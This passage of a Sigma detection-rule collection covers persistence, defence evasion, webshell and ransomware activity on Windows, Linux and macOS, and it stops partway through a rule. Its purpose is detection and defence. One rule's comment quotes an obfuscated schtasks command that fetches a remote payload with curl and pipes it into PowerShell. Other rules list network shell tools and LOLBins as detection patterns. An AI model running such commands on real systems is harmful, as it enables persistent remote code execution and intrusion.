title: Scheduled Cron Task/Job - Linux
id: 6b14bac8-3e3a-4324-8109-42f0546a347f
status: test
description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md
author: Alejandro Ortuno, oscd.community
date: 2020-10-06
modified: 2022-11-27
tags:
    - attack.execution
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1053.003
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: 'crontab'
        CommandLine|contains: '/tmp/'
    condition: selection
falsepositives:
    - Legitimate administration activities
level: medium

title: Scheduled Cron Task/Job - MacOs
id: 7c3b43d8-d794-47d2-800a-d277715aa460
status: test
description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md
author: Alejandro Ortuno, oscd.community
date: 2020-10-06
modified: 2022-11-27
tags:
    - attack.execution
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1053.003
logsource:
    category: process_creation
    product: macos
detection:
    selection:
        Image|endswith: '/crontab'
        CommandLine|contains: '/tmp/'
    condition: selection
falsepositives:
    - Legitimate administration activities
level: medium

title: Scheduled Task Creation From Potential Suspicious Parent Location
id: 9494479d-d994-40bf-a8b1-eea890237021
status: test
description: |
    Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location.
    Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
references:
    - https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/
author: Florian Roth (Nextron Systems)
date: 2022-02-23
modified: 2024-05-13
tags:
    - attack.execution
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1053.005
    - detection.threat-hunting
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        ParentImage|contains:
            - ':\Temp\'
            - '\AppData\Local\'
            - '\AppData\Roaming\'
            - '\Temporary Internet'
            - '\Users\Public\'
            - '\Windows\Temp\'
        Image|endswith: '\schtasks.exe'
        CommandLine|contains: '/Create '
    filter_optional_common:
        CommandLine|contains:
            - 'update_task.xml'
            - 'unattended.ini'
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Software installers that run from temporary folders and also install scheduled tasks
level: medium

title: Scheduled Task Creation with Curl and PowerShell Execution Combo
id: 1d174d38-8fda-4081-a9b6-56d9763c0cd8
status: experimental
description: |
    Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
    This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
references:
    - https://tria.ge/241015-l98snsyeje/behavioral2
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-02-05
tags:
    - attack.privilege-escalation
    - attack.execution
    - attack.persistence
    - attack.stealth
    - attack.t1053.005
    - attack.t1218
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    # Example: cmd start /min /c schtasks /create /tn PolicyConverter /sc minute /mo 15 /tr "conhost --headless cmd /v:on /c set a=https&set b=inh&set c=ostne&set d=tservice.co&set e=!a!://www.!b!!c!!d!m& curl -o - !e!/mscu/lokc.php?wl=HGNBWBGW**Admin | powershell" /rl Highest
    selection_img:
        Image|endswith: '\schtasks.exe'
        CommandLine|contains|windash: ' /create '
    selection_curl:
        CommandLine|contains|all:
            - 'curl '
            - 'http'
            - '-o'
    selection_powershell:
        CommandLine|contains: 'powershell'
    condition: all of selection_*
falsepositives:
    - Legitimate use of schtasks for administrative purposes.
    - Automation scripts combining curl and PowerShell in controlled environments.
level: medium

title: Screen Capture Activity Via Psr.EXE
id: 2158f96f-43c2-43cb-952a-ab4580f32382
status: test
description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Psr/
    - https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
author: Beyu Denis, oscd.community
date: 2019-10-12
modified: 2024-01-04
tags:
    - attack.collection
    - attack.t1113
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\Psr.exe'
        CommandLine|contains:
            - '/start'
            - '-start'
    condition: selection
falsepositives:
    - Unknown
level: medium

title: ScreenConnect Temporary Installation Artefact
id: fec96f39-988b-4586-b746-b93d59fd1922
status: test
description: |
    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows
author: frack113
date: 2022-02-13
tags:
    - attack.command-and-control
    - attack.t1219.002
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|contains: '\Bin\ScreenConnect.' # pattern to dll and jar file
    condition: selection
falsepositives:
    - Legitimate use
level: medium

title: ScreenConnect User Database Modification
id: 1a821580-588b-4323-9422-660f7e131020
related:
    - id: 4109cb6a-a4af-438a-9f0c-056abba41c6f
      type: similar
status: test
description: |
    Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
    This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
references:
    - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
    - https://www.cve.org/CVERecord?id=CVE-2024-1709
    - https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress
date: 2024-02-21
tags:
    - attack.persistence
    - cve.2024-1709
    - detection.emerging-threats
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith: '.xml'
        TargetFilename|contains|all:
            - 'Temp'
            - 'ScreenConnect'
        Image|endswith: '\ScreenConnect.Service.exe'
    condition: selection
falsepositives:
    - This will occur legitimately as well and will result in some benign activity.
level: medium

title: ScreenSaver Registry Key Set
id: 40b6e656-4e11-4c0c-8772-c1cc6dae34ce
status: test
description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl
references:
    - https://twitter.com/VakninHai/status/1517027824984547329
    - https://twitter.com/pabraeken/status/998627081360695297
    - https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files
author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
date: 2022-05-04
modified: 2023-08-17
tags:
    - attack.stealth
    - attack.t1218.011
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        Image|endswith: '\rundll32.exe'
    registry:
        TargetObject|contains: '\Control Panel\Desktop\SCRNSAVE.EXE'
        Details|endswith: '.scr'
    filter:
        Details|contains:
            - 'C:\Windows\System32\'
            - 'C:\Windows\SysWOW64\'
    condition: selection and registry and not filter
falsepositives:
    - Legitimate use of screen saver
level: medium

title: Scripted Diagnostics Turn Off Check Enabled - Registry
id: 7d995e63-ec83-4aa3-89d5-8a17b5c87c86
status: test
description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability
references:
    - https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw
author: 'Christopher Peacock @securepeacock, SCYTHE @scythe_io'
date: 2022-06-15
modified: 2023-08-17
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject|endswith: '\Policies\Microsoft\Windows\ScriptedDiagnostics\TurnOffCheck'
        Details: 'DWORD (0x00000001)'
    condition: selection
falsepositives:
    - Administrator actions
level: medium

title: Scripting/CommandLine Process Spawned Regsvr32
id: ab37a6ec-6068-432b-a64e-2c7bf95b1d22
related:
    - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
      type: obsolete
status: test
description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
references:
    - https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
    - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-26
tags:
    - attack.stealth
    - attack.t1218.010
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\cmd.exe'
            - '\cscript.exe'
            - '\mshta.exe'
            - '\powershell_ise.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\wscript.exe'
        Image|endswith: '\regsvr32.exe'
    filter_main_rpcproxy:
        ParentImage: C:\Windows\System32\cmd.exe
        CommandLine|endswith: ' /s C:\Windows\System32\RpcProxy\RpcProxy.dll'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary
    - Some legitimate Windows services
level: medium # Can be reduced to low if you experience a ton of FP

title: Sdclt Child Processes
id: da2738f2-fadb-4394-afa7-0a0674885afa
status: test
description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.
references:
    - https://github.com/OTRF/detection-hackathon-apt29/issues/6
    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-05-02
modified: 2021-11-27
tags:
    - attack.privilege-escalation
    - attack.t1548.002
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\sdclt.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium

title: Security Software Discovery - MacOs
id: 0ed75b9c-c73b-424d-9e7d-496cd565fbe0
status: test
description: Detects usage of system utilities (only grep for now) to discover security software discovery
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md
author: Daniil Yugoslavskiy, oscd.community
date: 2020-10-19
modified: 2022-11-27
tags:
    - attack.discovery
    - attack.t1518.001
logsource:
    category: process_creation
    product: macos
detection:
    image:
        Image: '/usr/bin/grep'
    selection_cli_1:
        CommandLine|contains:
            - 'nessusd'        # nessus vulnerability scanner
            - 'santad'         # google santa
            - 'CbDefense'      # carbon black
            - 'falcond'        # crowdstrike falcon
            - 'td-agent'       # fluentd log shipper
            - 'packetbeat'     # elastic network logger/shipper
            - 'filebeat'       # elastic log file shipper
            - 'auditbeat'      # elastic auditing agent/log shipper
            - 'osqueryd'       # facebook osquery
            - 'BlockBlock'     # Objective-See persistence locations watcher/blocker
            - 'LuLu'           # Objective-See firewall management utility
    selection_cli_2: # Objective Development Software firewall management utility
        CommandLine|contains|all:
            - 'Little'
            - 'Snitch'
    condition: image and 1 of selection_cli_*
falsepositives:
    - Legitimate activities
level: medium

title: Self Extraction Directive File Created In Potentially Suspicious Location
id: 760e75d8-c3b5-409b-a9bf-6130b4c4603f
related:
    - id: ab90dab8-c7da-4010-9193-563528cfa347
      type: derived
status: test
description: |
    Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.
    These files are used by the "iexpress.exe" utility in order to create self extracting packages.
    Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
references:
    - https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html
    - https://en.wikipedia.org/wiki/IExpress
    - https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-02-05
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|contains:
            - ':\ProgramData\'
            - ':\Temp\'
            - ':\Windows\System32\Tasks\'
            - ':\Windows\Tasks\'
            - ':\Windows\Temp\'
            - '\AppData\Local\Temp\'
        TargetFilename|endswith: '.sed'
    condition: selection
falsepositives:
    - Unknown
level: medium

title: Service Binary in User Controlled Folder
id: 277dc340-0540-42e7-8efb-5ff460045e07
related:
    - id: c625c4c2-515d-407f-8bb6-456f65955669
      type: obsolete
status: test
description: |
    Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\".
    Attackers often use such directories for staging purposes.
    This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation.
    Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
date: 2022-05-02
modified: 2024-03-25
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
    - detection.threat-hunting
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains|all:
            - 'ControlSet'
            - '\Services\'
        TargetObject|endswith: '\ImagePath'
        Details|contains:
            - ':\ProgramData\'
            - '\AppData\Local\'
            - '\AppData\Roaming\'
    filter_optional_zoom:
        TargetObject|contains: '\Services\ZoomCptService'
        Details|contains: 'C:\Program Files\Common Files\Zoom\Support\CptService.exe'
    filter_optional_mbami:
        TargetObject|contains: '\Services\MBAMInstallerService'
        Details|contains|all:
            - 'C:\Users\'
            - 'AppData\Local\Temp\MBAMInstallerService.exe'
    filter_main_windefend:
        TargetObject|contains:
            - '\Services\WinDefend\'
            - '\Services\MpKs'
        Details|contains: 'C:\ProgramData\Microsoft\Windows Defender\'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: medium

title: ServiceDll Hijack
id: 612e47e9-8a59-43a6-b404-f48683f45bd6
status: test
description: |
    Detects changes to the "ServiceDLL" value related to a service in the registry.
    This is often used as a method of persistence.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time
    - https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/
author: frack113
date: 2022-02-04
modified: 2024-04-03
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1543.003
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains|all:
            - '\System\'
            - 'ControlSet'
            - '\Services\'
        TargetObject|endswith: '\Parameters\ServiceDll'
    filter_main_printextensionmanger:
        Details: 'C:\Windows\system32\spool\drivers\x64\3\PrintConfig.dll'
    filter_main_domain_controller:
        Image: 'C:\Windows\system32\lsass.exe'
        TargetObject|endswith: '\Services\NTDS\Parameters\ServiceDll'
        Details: '%%systemroot%%\system32\ntdsa.dll'
    filter_main_poqexec:
        Image: 'C:\Windows\System32\poqexec.exe'
    filter_optional_safetica:
        Image|endswith: '\regsvr32.exe'
        Details: 'C:\Windows\System32\STAgent.dll'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Administrative scripts
    - Installation of a service
level: medium

title: Session Manager Autorun Keys Modification
id: 046218bd-e0d8-4113-a3c3-895a12b2b298
related:
    - id: 17f878b8-9968-4578-b814-c4217fc5768c
      type: obsolete
status: test
description: Detects modification of autostart extensibility point (ASEP) in registry.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns
    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
date: 2019-10-25
modified: 2023-08-17
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1547.001
    - attack.t1546.009
logsource:
    category: registry_set
    product: windows
detection:
    session_manager_base:
        TargetObject|contains: '\System\CurrentControlSet\Control\Session Manager'
    session_manager:
        TargetObject|contains:
            - '\SetupExecute'
            - '\S0InitialCommand'
            - '\KnownDlls'
            - '\Execute'
            - '\BootExecute'
            - '\AppCertDlls'
    filter:
        Details: '(Empty)'
    condition: session_manager_base and session_manager and not filter
falsepositives:
    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
    - Legitimate administrator sets up autorun keys for legitimate reason
level: medium

title: Setup16.EXE Execution With Custom .Lst File
id: 99c8be4f-3087-4f9f-9c24-8c7e257b442e
status: test
description: |
    Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file.
    These ".lst" file can contain references to external program that "Setup16.EXE" will execute.
    Attackers and adversaries might leverage this as a living of the land utility.
references:
    - https://www.hexacorn.com/blog/2024/10/12/the-sweet16-the-oldbin-lolbin-called-setup16-exe/
author: frack113
date: 2024-12-01
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1574.005
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage: 'C:\Windows\SysWOW64\setup16.exe'
        ParentCommandLine|contains: ' -m '
    filter_optional_valid_path:
        Image|startswith: 'C:\~MSSETUP.T\'
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - On modern Windows system, the "Setup16" utility is practically never used, hence false positive should be very rare.
level: medium

title: Shell Invocation via Apt - Linux
id: bb382fd5-b454-47ea-a264-1828e4c766d6
status: test
description: |
    Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands.
    Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
references:
    - https://gtfobins.github.io/gtfobins/apt/
    - https://gtfobins.github.io/gtfobins/apt-get/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-28
modified: 2024-09-02
tags:
    - attack.discovery
    - attack.t1083
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith:
            - '/apt'
            - '/apt-get'
        CommandLine|contains: 'APT::Update::Pre-Invoke::='
    condition: selection
falsepositives:
    - Unknown
level: medium

title: Shell Process Spawned by Java.EXE
id: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0
related:
    - id: 0d34ed8b-1c12-4ff2-828c-16fc860b766d
      type: similar
status: test
description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
references:
    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali
date: 2021-12-17
modified: 2024-01-18
tags:
    - attack.initial-access
    - attack.persistence
    - attack.privilege-escalation
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\java.exe'
        Image|endswith:
            - '\bash.exe'
            - '\cmd.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
    filter_main_build:
        ParentImage|contains: 'build'  # excluding CI build agents
        CommandLine|contains: 'build'  # excluding CI build agents
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Legitimate calls to system binaries
    - Company specific internal usage
level: medium

title: Start of NT Virtual DOS Machine
id: 16905e21-66ee-42fe-b256-1318ada2d770
status: test
description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications
references:
    - https://learn.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support
    - https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7
    - https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/
    - https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/
author: frack113
date: 2022-07-16
tags:
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\ntvdm.exe'
            - '\csrstub.exe'
    condition: selection
falsepositives:
    - Legitimate use
level: medium

title: Startup Folder File Write
id: 2aa0a6b4-a865-495b-ab51-c28249537b75
related:
    - id: 28208707-fe31-437f-9a7f-4b1108b94d2e
      type: similar
status: test
description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.
references:
    - https://github.com/OTRF/detection-hackathon-apt29/issues/12
    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-05-02
modified: 2025-12-03
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1547.001
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|contains: '\Microsoft\Windows\Start Menu\Programs\StartUp'
    filter_main_update:
        - Image:
              - 'C:\Windows\System32\wuauclt.exe'
              - 'C:\Windows\uus\ARM64\wuaucltcore.exe'
        - TargetFilename|startswith:
              - 'C:\$WINDOWS.~BT\NewOS\'
              - 'C:\$WinREAgent\Scratch\Mount\'
    filter_optional_onenote:
        Image|endswith: '\ONENOTE.EXE'
        TargetFilename|endswith: '\Send to OneNote.lnk'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate
level: medium

title: Suspicious Appended Extension
id: e3f673b3-65d1-4d80-9146-466f8b63fa99
status: test
description: Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as ".jpg.crypted", ".docx.locky", etc.
references:
    - https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/
    - https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/
author: frack113
date: 2022-07-16
modified: 2023-11-11
tags:
    - attack.impact
    - attack.t1486
logsource:
    product: windows
    category: file_rename
    definition: 'Requirements: Microsoft-Windows-Kernel-File Provider with at least the KERNEL_FILE_KEYWORD_RENAME_SETLINK_PATH keyword'
detection:
    selection:
        SourceFilename|endswith:
            - '.doc'
            - '.docx'
            - '.jpeg'
            - '.jpg'
            - '.lnk'
            - '.pdf'
            - '.png'
            - '.pst'
            - '.rtf'
            - '.xls'
            - '.xlsx'
        TargetFilename|contains:
            - '.doc.'
            - '.docx.'
            - '.jpeg.'
            - '.jpg.'
            - '.lnk.'
            - '.pdf.'
            - '.png.'
            - '.pst.'
            - '.rtf.'
            - '.xls.'
            - '.xlsx.'
    filter_main_generic:
        TargetFilename|endswith:
            # Note: Please add more used extensions by backup or recovery software
            - '.backup'
            - '.bak'
            - '.old'
            - '.orig'
            - '.temp'
            - '.tmp'
    filter_optional_anaconda:
        TargetFilename|contains: ':\ProgramData\Anaconda3\'
        TargetFilename|endswith: '.c~'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Backup software
level: medium

title: Suspicious Child Process of SAP NetWeaver
id: 5b304bcb-ac33-49d0-87af-fa1b3ca94333
status: experimental
description: |
    Detects suspicious child processes spawned by SAP NetWeaver that could indicate potential
    exploitation of vulnerability that allows arbitrary execution via webshells such as CVE-2025-31324.
author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-04-28
tags:
    - attack.execution
    - attack.initial-access
    - attack.t1190
    - attack.persistence
    - attack.t1059.003
    - cve.2025-31324
    - detection.emerging-threats
references:
    - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent_img:
        ParentImage|contains:
            - '\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work'
            - '\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root'
    selection_current_dict:
        CurrentDirectory|contains:
            - '\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work'
            - '\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root'
    selection_child:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\powershell_ise.exe'
            - '\pwsh.exe'
            - '\wscript.exe'
            - '\cscript.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\mshta.exe'
            - '\certutil.exe'
            - '\bitsadmin.exe'
            - '\python.exe'
    condition: (selection_parent_img or selection_current_dict) and selection_child
falsepositives:
    - Legitimate administrative activities such as software updates
level: medium

title: Suspicious Child Process of SAP NetWeaver - Linux
id: 69dea60b-2deb-4c9e-a685-ad542f4367f9
status: experimental
description: |
    Detects suspicious child processes spawned by SAP NetWeaver on Linux systems that could indicate potential
    exploitation of vulnerability that allows arbitrary execution via webshells such as CVE-2025-31324.
author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-04-28
tags:
    - attack.execution
    - attack.initial-access
    - attack.t1190
    - attack.persistence
    - attack.t1059.003
    - cve.2025-31324
    - detection.emerging-threats
references:
    - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/
logsource:
    category: process_creation
    product: linux
detection:
    selection_parent_img:
        ParentImage|contains:
            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work'
            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root'
    selection_current_dict:
        CurrentDirectory|contains:
            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work'
            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root'
    selection_child:
        Image|endswith:
            - '/ash'
            - '/bash'
            - '/csh'
            - '/dash'
            - '/ksh'
            - '/sh'
            - '/tcsh'
            - '/zsh'
            - '/python'
            - '/python2'
            - '/python3'
            - '/perl'
            - '/ruby'
            - '/curl'
            - '/wget'
            - '/nc'
            - '/netcat'
            - '/ncat'
            - '/socat'
            - '/nmap'
            - '/telnet'
            - '/awk'
            - '/sed'
    condition: (selection_parent_img or selection_current_dict) and selection_child
falsepositives:
    - Legitimate administrative activities such as software updates
level: medium

title: Suspicious CodePage Switch Via CHCP
id: c7942406-33dd-4377-a564-0f62db0593a3
status: test
description: Detects a code page switch in command line or batch scripts to a rare language
references:
    - https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers
    - https://twitter.com/cglyer/status/1183756892952248325
author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
date: 2019-10-14
modified: 2023-03-07
tags:
    - attack.stealth
    - attack.t1036
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\chcp.com'
        CommandLine|endswith:
            - ' 936'    # Chinese
            # - ' 1256' # Arabic
            - ' 1258'   # Vietnamese
            # - ' 855'  # Russian
            # - ' 866'  # Russian
            # - ' 864'  # Arabic
    condition: selection
falsepositives:
    - Administrative activity (adjust code pages according to your organization's region)
level: medium
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml

title: Suspicious Creation TXT File in User Desktop
id: caf02a0a-1e1c-4552-9b48-5e070bd88d11
status: test
description: |
    Detects creation of .txt files in user desktop folders via cmd.exe. This behavior may indicate ransomware deploying ransom notes, but can also occur during legitimate administrative tasks.
    Analysts should investigate for suspicious filenames (e.g., "RANSOM", "DECRYPT", "READ_ME"), bulk file creation patterns, or concurrent encryption activity to determine if this is part of a ransomware attack.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note
author: frack113
date: 2021-12-26
modified: 2026-01-09
tags:
    - attack.impact
    - attack.t1486
    - detection.threat-hunting
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image|endswith: '\cmd.exe'
        TargetFilename|contains|all:
            - '\Users\'
            - '\Desktop\'
        TargetFilename|endswith: '.txt'
    condition: selection
falsepositives:
    - Unknown
level: medium

title: Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit
id: 5a7132c0-86db-4e6b-95c0-f0e9d7f461aa
status: experimental
description: |
    Detects creation of '.library-ms' files, which may indicate exploitation of CVE-2025-24054. This vulnerability allows an attacker to trigger an automatic outbound SMB or WebDAV authentication request to a remote server upon archive extraction.
    If the system is unpatched, no user interaction is required beyond extracting a malicious archive—potentially exposing the user's NTLMv2-SSP hash to the attacker.
references:
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054
    - https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/
author: Gene Kazimiarovich
date: 2025-04-20
tags:
    - detection.emerging-threats
    - attack.credential-access
    - attack.t1187   # Forced Authentication
